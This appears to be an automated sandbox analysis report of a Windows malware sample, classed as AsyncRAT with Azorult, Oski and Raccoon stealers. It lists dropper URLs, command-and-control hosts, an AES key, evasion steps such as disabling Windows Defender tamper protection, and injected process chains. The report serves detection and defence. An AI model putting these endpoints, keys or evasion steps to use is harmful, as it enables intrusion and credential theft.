asyncrat | 0fd2b5dba8eb6762b397cf61bd9c2ff9de3eefc8eb8c4cbb1002d1b9c96fe5d1

Analysis

max time kernel
147s
max time network
149s
platform
windows7_x64
resource
win7v20201028
submitted
29-11-2020 07:28

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

8e84fa4f3e50e2bdc357c348b923a8b4.exe
Size

210KB
MD5

8e84fa4f3e50e2bdc357c348b923a8b4
SHA1

8ccc6b05df9cd2ab9275e2848a997176b3cd41c8
SHA256

0fd2b5dba8eb6762b397cf61bd9c2ff9de3eefc8eb8c4cbb1002d1b9c96fe5d1
SHA512

cab0b936c6834068a94d55a7c3172b3b27766ddd41d5422ec2e4b1f2c0f39fa12f1258c4dc5483f061b635976ce398b91d274fbab812b64657ea3eb06e5dc81c

Score

10^/10

asyncrat azorult oski raccoon 5e4db353b88c002ba6466c06437973619aad03b3 discovery evasion infostealer rat spyware stealer trojan

Malware Config

Extracted

Language

ps1

Source

URLs

ps1.dropper

http://kfdhsa.ru/asdfg.exe

exe.dropper

http://kfdhsa.ru/asdfg.exe

Extracted

Language

ps1

Source

URLs

ps1.dropper

http://nicoslag.ru/asdfg.exe

exe.dropper

http://nicoslag.ru/asdfg.exe

Extracted

Language

ps1

Source

URLs

ps1.dropper

http://bit.do/e5K5i

exe.dropper

http://bit.do/e5K5i

Extracted

Language

ps1

Source

URLs

ps1.dropper

http://bit.do/e5K4M

exe.dropper

http://bit.do/e5K4M

Extracted

Language

ps1

Source

URLs

ps1.dropper

http://bit.do/e5K4b

exe.dropper

http://bit.do/e5K4b

Extracted

Language

ps1

Source

URLs

ps1.dropper

http://bratiop.ru/asdfg.exe

exe.dropper

http://bratiop.ru/asdfg.exe

Extracted

Family

raccoon

Botnet

5e4db353b88c002ba6466c06437973619aad03b3

Attributes

url4cnc
https://telete.in/brikitiki

rc4.plain

Extracted

Family

azorult

http://195.245.112.115/index.php

Extracted

Family

asyncrat

Version

0.5.7B

agentttt.ac.ug:6970

agentpurple.ac.ug:6970

Mutex

AsyncMutex_6SI8OkPnk

Attributes

aes_key
16dw6EDbQkYZp5BTs7cmLUicVtOA4UQr
anti_detection
false
autorun
false
bdos
false
delay
Default
host
agentttt.ac.ug,agentpurple.ac.ug
hwid
3
install_file
install_folder
%AppData%
mutex
AsyncMutex_6SI8OkPnk
pastebin_config
null
port
6970
version
0.5.7B

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers.
rat asyncrat
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
trojan infostealer azorult

Contains code to disable Windows Defender 8 IoCs

A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

Processes:

resource	yara_rule
behavioral1/memory/2284-266-0x0000000000400000-0x000000000040C000-memory.dmp	disable_win_def
behavioral1/memory/2284-269-0x0000000000400000-0x000000000040C000-memory.dmp	disable_win_def
behavioral1/memory/2284-267-0x000000000040616E-mapping.dmp	disable_win_def
behavioral1/memory/2284-270-0x0000000000400000-0x000000000040C000-memory.dmp	disable_win_def
behavioral1/memory/2764-281-0x0000000000400000-0x0000000000408000-memory.dmp	disable_win_def
behavioral1/memory/2764-284-0x0000000000403BEE-mapping.dmp	disable_win_def
behavioral1/memory/2764-286-0x0000000000400000-0x0000000000408000-memory.dmp	disable_win_def
behavioral1/memory/2764-287-0x0000000000400000-0x0000000000408000-memory.dmp	disable_win_def

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
Oski
Oski is an infostealer targeting browser data, crypto wallets.
infostealer oski
Raccoon
Simple but powerful infostealer which was very active in 2019.
stealer raccoon

Async RAT payload 4 IoCs

rat

Processes:

resource	yara_rule
behavioral1/memory/2052-244-0x0000000000400000-0x0000000000412000-memory.dmp	asyncrat
behavioral1/memory/2052-245-0x000000000040C76E-mapping.dmp	asyncrat
behavioral1/memory/2052-247-0x0000000000400000-0x0000000000412000-memory.dmp	asyncrat
behavioral1/memory/2052-248-0x0000000000400000-0x0000000000412000-memory.dmp	asyncrat

Blocklisted process makes network request 5 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

flow pid process

10 748 powershell.exe
14 1640 powershell.exe
17 1640 powershell.exe
18 812 powershell.exe
20 812 powershell.exe
Downloads MZ/PE file

flow	pid	process
10	748	powershell.exe
14	1640	powershell.exe
17	1640	powershell.exe
18	812	powershell.exe
20	812	powershell.exe

Executes dropped EXE 19 IoCs

Processes:

patch.exeegj.exepsz.exeFGbfttrev.exeFDvbcgfert.exepsz.exeFGbfttrev.exeFDvbcgfert.exeAGX5BdQGy2.exexB3Ix1zNAH.exeq7CSunWjQu.exepo80zUeK1c.exeAGX5BdQGy2.exeq7CSunWjQu.exeq7CSunWjQu.exeq7CSunWjQu.exepo80zUeK1c.exepo80zUeK1c.exepo80zUeK1c.exe

pid	process
1792	patch.exe
2620	egj.exe
2652	psz.exe
2780	FGbfttrev.exe
2812	FDvbcgfert.exe
2832	psz.exe
2884	FGbfttrev.exe
2916	FDvbcgfert.exe
2600	AGX5BdQGy2.exe
2728	xB3Ix1zNAH.exe
2804	q7CSunWjQu.exe
2760	po80zUeK1c.exe
2052	AGX5BdQGy2.exe
2016	q7CSunWjQu.exe
2348	q7CSunWjQu.exe
2284	q7CSunWjQu.exe
788	po80zUeK1c.exe
1328	po80zUeK1c.exe
2764	po80zUeK1c.exe

Loads dropped DLL 36 IoCs

Processes:

cmd.exepowershell.exepowershell.exepsz.exeFGbfttrev.exeFDvbcgfert.exepsz.exeAGX5BdQGy2.exeFDvbcgfert.exeq7CSunWjQu.exepo80zUeK1c.exe

pid	process
1988	cmd.exe
1640	powershell.exe
1640	powershell.exe
812	powershell.exe
812	powershell.exe
2652	psz.exe
2652	psz.exe
2652	psz.exe
2652	psz.exe
2780	FGbfttrev.exe
2812	FDvbcgfert.exe
2832	psz.exe
2832	psz.exe
2832	psz.exe
2832	psz.exe
2832	psz.exe
2832	psz.exe
2832	psz.exe
2832	psz.exe
2832	psz.exe
2832	psz.exe
2832	psz.exe
2832	psz.exe
2832	psz.exe
2600	AGX5BdQGy2.exe
2916	FDvbcgfert.exe
2916	FDvbcgfert.exe
2916	FDvbcgfert.exe
2916	FDvbcgfert.exe
2916	FDvbcgfert.exe
2804	q7CSunWjQu.exe
2804	q7CSunWjQu.exe
2804	q7CSunWjQu.exe
2760	po80zUeK1c.exe
2760	po80zUeK1c.exe
2760	po80zUeK1c.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Windows security modification 2 TTPs 2 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

Processes:

po80zUeK1c.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features	po80zUeK1c.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	po80zUeK1c.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Drops desktop.ini file(s) 2 IoCs

Processes:

psz.exe

description	ioc	process
File created	C:\Users\Admin\AppData\LocalLow\n9h9r91h8fna789q\desktop.ini	psz.exe
File opened for modification	C:\Users\Admin\AppData\LocalLow\n9h9r91h8fna789q\desktop.ini	psz.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs

Processes:

psz.exeFGbfttrev.exeFDvbcgfert.exe

pid process

2832 psz.exe
2832 psz.exe
2884 FGbfttrev.exe
2884 FGbfttrev.exe
2916 FDvbcgfert.exe
2916 FDvbcgfert.exe

pid	process
2832	psz.exe
2832	psz.exe
2884	FGbfttrev.exe
2884	FGbfttrev.exe
2916	FDvbcgfert.exe
2916	FDvbcgfert.exe

Suspicious use of SetThreadContext 6 IoCs

Processes:

psz.exeFGbfttrev.exeFDvbcgfert.exeAGX5BdQGy2.exeq7CSunWjQu.exepo80zUeK1c.exe

description	pid	process	target process
PID 2652 set thread context of 2832	2652	psz.exe	psz.exe
PID 2780 set thread context of 2884	2780	FGbfttrev.exe	FGbfttrev.exe
PID 2812 set thread context of 2916	2812	FDvbcgfert.exe	FDvbcgfert.exe
PID 2600 set thread context of 2052	2600	AGX5BdQGy2.exe	AGX5BdQGy2.exe
PID 2804 set thread context of 2284	2804	q7CSunWjQu.exe	q7CSunWjQu.exe
PID 2760 set thread context of 2764	2760	po80zUeK1c.exe	po80zUeK1c.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Checks processor information in registry 2 TTPs 1 IoCs
Processor information is often read in order to detect sandboxing environments.

Query Registry
T1012

System Information Discovery
T1082

Processes:

FDvbcgfert.exe

description ioc process

Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString FDvbcgfert.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

2972 timeout.exe
Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

1920 taskkill.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	FDvbcgfert.exe

pid	process
2972	timeout.exe

pid	process
1920	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 5 IoCs

adware spyware

Modify Registry

T1112

Processes:

mshta.exemshta.exemshta.exemshta.exemshta.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Modifies system certificate store 2 TTPs 5 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

psz.exexB3Ix1zNAH.exe

description	ioc	process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	psz.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	xB3Ix1zNAH.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	xB3Ix1zNAH.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	xB3Ix1zNAH.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13	psz.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeq7CSunWjQu.exeq7CSunWjQu.exe

pid	process
344	powershell.exe
1640	powershell.exe
1760	powershell.exe
748	powershell.exe
812	powershell.exe
432	powershell.exe
748	powershell.exe
1760	powershell.exe
344	powershell.exe
1640	powershell.exe
812	powershell.exe
432	powershell.exe
2804	q7CSunWjQu.exe
2804	q7CSunWjQu.exe
2804	q7CSunWjQu.exe
2804	q7CSunWjQu.exe
2284	q7CSunWjQu.exe
2284	q7CSunWjQu.exe
2284	q7CSunWjQu.exe
2284	q7CSunWjQu.exe
2284	q7CSunWjQu.exe
2284	q7CSunWjQu.exe
2284	q7CSunWjQu.exe
2284	q7CSunWjQu.exe
2284	q7CSunWjQu.exe
2284	q7CSunWjQu.exe
2284	q7CSunWjQu.exe
2284	q7CSunWjQu.exe
2284	q7CSunWjQu.exe
2284	q7CSunWjQu.exe
2284	q7CSunWjQu.exe
2284	q7CSunWjQu.exe
2284	q7CSunWjQu.exe
2284	q7CSunWjQu.exe
2284	q7CSunWjQu.exe
2284	q7CSunWjQu.exe
2284	q7CSunWjQu.exe
2284	q7CSunWjQu.exe
2284	q7CSunWjQu.exe
2284	q7CSunWjQu.exe
2284	q7CSunWjQu.exe
2284	q7CSunWjQu.exe
2284	q7CSunWjQu.exe
2284	q7CSunWjQu.exe
2284	q7CSunWjQu.exe
2284	q7CSunWjQu.exe
2284	q7CSunWjQu.exe
2284	q7CSunWjQu.exe
2284	q7CSunWjQu.exe
2284	q7CSunWjQu.exe
2284	q7CSunWjQu.exe
2284	q7CSunWjQu.exe
2284	q7CSunWjQu.exe
2284	q7CSunWjQu.exe
2284	q7CSunWjQu.exe
2284	q7CSunWjQu.exe
2284	q7CSunWjQu.exe
2284	q7CSunWjQu.exe
2284	q7CSunWjQu.exe
2284	q7CSunWjQu.exe
2284	q7CSunWjQu.exe
2284	q7CSunWjQu.exe
2284	q7CSunWjQu.exe
2284	q7CSunWjQu.exe

Suspicious behavior: MapViewOfSection 3 IoCs

Processes:

psz.exeFGbfttrev.exeFDvbcgfert.exe

pid process

2652 psz.exe
2780 FGbfttrev.exe
2812 FDvbcgfert.exe

pid	process
2652	psz.exe
2780	FGbfttrev.exe
2812	FDvbcgfert.exe

Suspicious use of AdjustPrivilegeToken 12 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeAGX5BdQGy2.exetaskkill.exeq7CSunWjQu.exepo80zUeK1c.exeq7CSunWjQu.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	344	powershell.exe
Token: SeDebugPrivilege	1760	powershell.exe
Token: SeDebugPrivilege	1640	powershell.exe
Token: SeDebugPrivilege	748	powershell.exe
Token: SeDebugPrivilege	432	powershell.exe
Token: SeDebugPrivilege	812	powershell.exe
Token: SeDebugPrivilege	2600	AGX5BdQGy2.exe
Token: SeDebugPrivilege	1920	taskkill.exe
Token: SeDebugPrivilege	2804	q7CSunWjQu.exe
Token: SeDebugPrivilege	2760	po80zUeK1c.exe
Token: SeDebugPrivilege	2284	q7CSunWjQu.exe
Token: SeDebugPrivilege	2432	powershell.exe

Suspicious use of SetWindowsHookEx 6 IoCs

Processes:

psz.exeegj.exeFGbfttrev.exeFDvbcgfert.exeq7CSunWjQu.exe

pid process

2652 psz.exe
2620 egj.exe
2780 FGbfttrev.exe
2812 FDvbcgfert.exe
2284 q7CSunWjQu.exe
2284 q7CSunWjQu.exe

pid	process
2652	psz.exe
2620	egj.exe
2780	FGbfttrev.exe
2812	FDvbcgfert.exe
2284	q7CSunWjQu.exe
2284	q7CSunWjQu.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

8e84fa4f3e50e2bdc357c348b923a8b4.execmd.exemshta.exemshta.exemshta.exemshta.exemshta.exemshta.exepowershell.exepowershell.exe

description	pid	process	target process
PID 740 wrote to memory of 1988	740	8e84fa4f3e50e2bdc357c348b923a8b4.exe	cmd.exe
PID 740 wrote to memory of 1988	740	8e84fa4f3e50e2bdc357c348b923a8b4.exe	cmd.exe
PID 740 wrote to memory of 1988	740	8e84fa4f3e50e2bdc357c348b923a8b4.exe	cmd.exe
PID 740 wrote to memory of 1988	740	8e84fa4f3e50e2bdc357c348b923a8b4.exe	cmd.exe
PID 1988 wrote to memory of 1156	1988	cmd.exe	mshta.exe
PID 1988 wrote to memory of 1156	1988	cmd.exe	mshta.exe
PID 1988 wrote to memory of 1156	1988	cmd.exe	mshta.exe
PID 1988 wrote to memory of 1156	1988	cmd.exe	mshta.exe
PID 1988 wrote to memory of 1224	1988	cmd.exe	mshta.exe
PID 1988 wrote to memory of 1224	1988	cmd.exe	mshta.exe
PID 1988 wrote to memory of 1224	1988	cmd.exe	mshta.exe
PID 1988 wrote to memory of 1224	1988	cmd.exe	mshta.exe
PID 1988 wrote to memory of 1964	1988	cmd.exe	mshta.exe
PID 1988 wrote to memory of 1964	1988	cmd.exe	mshta.exe
PID 1988 wrote to memory of 1964	1988	cmd.exe	mshta.exe
PID 1988 wrote to memory of 1964	1988	cmd.exe	mshta.exe
PID 1988 wrote to memory of 1896	1988	cmd.exe	mshta.exe
PID 1988 wrote to memory of 1896	1988	cmd.exe	mshta.exe
PID 1988 wrote to memory of 1896	1988	cmd.exe	mshta.exe
PID 1988 wrote to memory of 1896	1988	cmd.exe	mshta.exe
PID 1988 wrote to memory of 1208	1988	cmd.exe	mshta.exe
PID 1988 wrote to memory of 1208	1988	cmd.exe	mshta.exe
PID 1988 wrote to memory of 1208	1988	cmd.exe	mshta.exe
PID 1988 wrote to memory of 1208	1988	cmd.exe	mshta.exe
PID 1988 wrote to memory of 1712	1988	cmd.exe	mshta.exe
PID 1988 wrote to memory of 1712	1988	cmd.exe	mshta.exe
PID 1988 wrote to memory of 1712	1988	cmd.exe	mshta.exe
PID 1988 wrote to memory of 1712	1988	cmd.exe	mshta.exe
PID 1988 wrote to memory of 1792	1988	cmd.exe	patch.exe
PID 1988 wrote to memory of 1792	1988	cmd.exe	patch.exe
PID 1988 wrote to memory of 1792	1988	cmd.exe	patch.exe
PID 1988 wrote to memory of 1792	1988	cmd.exe	patch.exe
PID 1896 wrote to memory of 1760	1896	mshta.exe	powershell.exe
PID 1896 wrote to memory of 1760	1896	mshta.exe	powershell.exe
PID 1896 wrote to memory of 1760	1896	mshta.exe	powershell.exe
PID 1896 wrote to memory of 1760	1896	mshta.exe	powershell.exe
PID 1224 wrote to memory of 432	1224	mshta.exe	powershell.exe
PID 1224 wrote to memory of 432	1224	mshta.exe	powershell.exe
PID 1224 wrote to memory of 432	1224	mshta.exe	powershell.exe
PID 1224 wrote to memory of 432	1224	mshta.exe	powershell.exe
PID 1156 wrote to memory of 812	1156	mshta.exe	powershell.exe
PID 1156 wrote to memory of 812	1156	mshta.exe	powershell.exe
PID 1156 wrote to memory of 812	1156	mshta.exe	powershell.exe
PID 1156 wrote to memory of 812	1156	mshta.exe	powershell.exe
PID 1712 wrote to memory of 344	1712	mshta.exe	powershell.exe
PID 1712 wrote to memory of 344	1712	mshta.exe	powershell.exe
PID 1712 wrote to memory of 344	1712	mshta.exe	powershell.exe
PID 1712 wrote to memory of 344	1712	mshta.exe	powershell.exe
PID 1964 wrote to memory of 1640	1964	mshta.exe	powershell.exe
PID 1964 wrote to memory of 1640	1964	mshta.exe	powershell.exe
PID 1964 wrote to memory of 1640	1964	mshta.exe	powershell.exe
PID 1964 wrote to memory of 1640	1964	mshta.exe	powershell.exe
PID 1208 wrote to memory of 748	1208	mshta.exe	powershell.exe
PID 1208 wrote to memory of 748	1208	mshta.exe	powershell.exe
PID 1208 wrote to memory of 748	1208	mshta.exe	powershell.exe
PID 1208 wrote to memory of 748	1208	mshta.exe	powershell.exe
PID 1640 wrote to memory of 2620	1640	powershell.exe	egj.exe
PID 1640 wrote to memory of 2620	1640	powershell.exe	egj.exe
PID 1640 wrote to memory of 2620	1640	powershell.exe	egj.exe
PID 1640 wrote to memory of 2620	1640	powershell.exe	egj.exe
PID 812 wrote to memory of 2652	812	powershell.exe	psz.exe
PID 812 wrote to memory of 2652	812	powershell.exe	psz.exe
PID 812 wrote to memory of 2652	812	powershell.exe	psz.exe
PID 812 wrote to memory of 2652	812	powershell.exe	psz.exe

C:\Users\Admin\AppData\Local\Temp\8e84fa4f3e50e2bdc357c348b923a8b4.exe
"C:\Users\Admin\AppData\Local\Temp\8e84fa4f3e50e2bdc357c348b923a8b4.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:740

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\48A4.tmp\start.bat" C:\Users\Admin\AppData\Local\Temp\8e84fa4f3e50e2bdc357c348b923a8b4.exe"
2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1988

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\48A4.tmp\m1.hta"
3⤵
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:1156

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
